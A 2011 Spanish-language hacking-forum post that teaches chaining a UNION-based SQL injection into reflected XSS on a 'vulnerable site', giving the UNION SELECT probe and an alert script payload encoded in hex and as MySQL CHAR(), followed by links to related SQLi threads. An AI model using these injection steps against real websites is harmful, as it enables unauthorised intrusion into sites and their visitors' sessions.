send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

XSS no persistente con SQLi

  • 0 Respuestas
  • 1409 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Abnormality

  • *
  • Underc0der
  • Mensajes: 392
  • Actividad:
    0%
  • Reputación 0
  • %SystemRoot%
    • Ver Perfil
    • Email
« en: Agosto 25, 2011, 12:08:40 am »
Para hacer una inyeccion XSS no persistente a travez de una inyeccion SQL hay que hacer lo siguiente:

Encontramos un sitio vulnerable

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login'

Luego hacemos un UNION con la cantidad de columnas (Ej: 6)

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login UNION SELECT 1,2,3,4,5,6--

Ahi aparecen las columnas vulnerables, entonces es cuando inyectamos nuestro codigo

El original es

<script>alert("XSS");</script>

Pero hay que encodearlo en HEX o usar la funcion CHAR de MySQL

HEX ENCODED:


0x3c7363726970743e616c657274282258535322293b3c2f7363726970743e

MySQL CHAR:

CHAR(60, 115, 99, 114, 105, 112, 116, 62, 97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 34, 41, 59, 60, 47, 115, 99, 114, 105, 112, 116, 62)

Espero que les haya gustado!

 

¿Te gustó el post? COMPARTILO!



SQLI tutorial pour débutants ( newbie) ecrite par *..::Key-m0rt::..*

Iniciado por ..::key-m0rt::..

Respuestas: 0
Vistas: 1548
Último mensaje Marzo 23, 2010, 12:38:21 pm
por ..::key-m0rt::..
LFI+SQLI [Incluyendo ficheros a travez de valores enteros]

Iniciado por q3rv0

Respuestas: 4
Vistas: 1583
Último mensaje Julio 24, 2013, 01:43:36 pm
por M5f3r0
[Video] Jugando al JuAckEr pt 1. [No es tutorial][SQLi+Deface]

Iniciado por Xt3mP

Respuestas: 0
Vistas: 1330
Último mensaje Julio 21, 2010, 07:43:44 pm
por Xt3mP
SQLi bypaseando el firewall y pasando el examen!

Iniciado por arthusu

Respuestas: 5
Vistas: 2240
Último mensaje Junio 07, 2013, 10:12:11 pm
por morodog
Exploit Career jobs wordpress[SQLi]

Iniciado por OswireW0rding

Respuestas: 1
Vistas: 1731
Último mensaje Marzo 12, 2014, 10:39:40 pm
por .:UND3R:.